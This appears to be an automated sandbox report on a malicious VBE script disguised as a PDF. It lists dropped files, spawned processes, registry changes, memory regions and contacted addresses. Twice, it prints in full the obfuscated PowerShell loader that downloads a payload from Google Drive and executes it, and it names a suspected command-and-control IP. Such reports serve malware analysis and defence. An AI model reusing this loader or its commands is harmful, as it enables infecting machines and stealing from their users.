Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f21l2rrq.4hp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phyf1my5.4aa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpbhzuw5.bia.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vu00q5i3.ua0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Drgs.Trs
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill
Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function
Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders
-lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){
& ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra
nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab;
Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo
Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1
Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes
'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph
oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr
gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK
hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes
'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes
'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv
rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj
');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa
lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas
dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke
ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS
TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc
Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls
blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl
voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb
Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI
FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu
int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye
apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers
');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd
mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten
Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir
';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig
ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell
Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities)
{Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag
Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig-
HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder
unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct
titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ')
;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug
imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa
SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis
(Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans
unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku
ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica
Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav
UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S
ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg
Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy
syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um:
HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t
Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha
AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9
,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss
Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou
)Normy ');Electroendosmosis $Yasmak;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill
Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function
Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders
-lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){
& ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra
nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab;
Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo
Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1
Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes
'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph
oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr
gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK
hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes
'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes
'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv
rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj
');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa
lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas
dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke
ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS
TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc
Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls
blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl
voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb
Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI
FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu
int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye
apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers
');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd
mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten
Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir
';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig
ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell
Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities)
{Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag
Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig-
HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder
unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct
titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ')
;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug
imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa
SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis
(Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans
unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku
ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica
Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav
UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S
ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg
Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy
syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um:
HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t
Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha
AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9
,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss
Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou
)Normy ');Electroendosmosis $Yasmak;"
|
|
|
|
C:\Windows\SysWOW64\dxdiag.exe
|
"C:\Windows\syswow64\dxdiag.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://137.184.191.215/index.php/check.php?id=1
|
137.184.191.215
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://wordpress.org/documentation/article/faq-troubleshooting/
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh8
|
unknown
|
||
|
https://aka.ms/pscore6lBsq
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.google.com/-
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.184.238
|
||
|
drive.usercontent.google.com
|
142.250.184.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
137.184.191.215
|
unknown
|
United States
|
|
|
|
142.250.184.193
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.184.238
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\???????????????????????????????????????????
|
188E93
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5CFB000
|
trusted library allocation
|
page read and write
|
|
|
|
8960000
|
direct allocation
|
page execute and read and write
|
|
|
|
B1AF000
|
direct allocation
|
page execute and read and write
|
|
|
|
2B4370DF000
|
trusted library allocation
|
page read and write
|
|
|
|
7070000
|
direct allocation
|
page read and write
|
||
|
2B42546D000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
8990000
|
direct allocation
|
page read and write
|
||
|
6130000
|
direct allocation
|
page read and write
|
||
|
8320000
|
heap
|
page read and write
|
||
|
2B427C2B000
|
trusted library allocation
|
page read and write
|
||
|
2F1B000
|
stack
|
page read and write
|
||
|
7589000
|
heap
|
page read and write
|
||
|
5FA1000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
772E000
|
stack
|
page read and write
|
||
|
216E0000
|
heap
|
page read and write
|
||
|
5CE2000
|
trusted library allocation
|
page read and write
|
||
|
217F0000
|
remote allocation
|
page read and write
|
||
|
4CA8000
|
trusted library allocation
|
page read and write
|
||
|
2152D000
|
stack
|
page read and write
|
||
|
7060000
|
direct allocation
|
page read and write
|
||
|
F9B6A8A000
|
stack
|
page read and write
|
||
|
30D0000
|
trusted library allocation
|
page read and write
|
||
|
2B427C43000
|
trusted library allocation
|
page read and write
|
||
|
2B43F77A000
|
heap
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page read and write
|
||
|
30CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
20891E62000
|
heap
|
page read and write
|
||
|
2146E000
|
stack
|
page read and write
|
||
|
2088FFA0000
|
heap
|
page read and write
|
||
|
2B427881000
|
trusted library allocation
|
page read and write
|
||
|
2B43F49E000
|
heap
|
page read and write
|
||
|
92A0000
|
direct allocation
|
page execute and read and write
|
||
|
5F9D000
|
heap
|
page read and write
|
||
|
20890390000
|
heap
|
page read and write
|
||
|
20891E54000
|
heap
|
page read and write
|
||
|
F9B5D3B000
|
stack
|
page read and write
|
||
|
2B4274F3000
|
trusted library allocation
|
page read and write
|
||
|
20891E5B000
|
heap
|
page read and write
|
||
|
7690000
|
heap
|
page execute and read and write
|
||
|
2B427C51000
|
trusted library allocation
|
page read and write
|
||
|
2B43F5E0000
|
heap
|
page read and write
|
||
|
82E0000
|
trusted library allocation
|
page read and write
|
||
|
20890109000
|
heap
|
page read and write
|
||
|
F9B6B0B000
|
stack
|
page read and write
|
||
|
2B425460000
|
heap
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
2B43F4A0000
|
heap
|
page read and write
|
||
|
2B4254B5000
|
heap
|
page read and write
|
||
|
837D000
|
stack
|
page read and write
|
||
|
BBAF000
|
direct allocation
|
page execute and read and write
|
||
|
30F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B43F7B4000
|
heap
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
5F67000
|
heap
|
page read and write
|
||
|
2089013E000
|
heap
|
page read and write
|
||
|
21905000
|
direct allocation
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page read and write
|
||
|
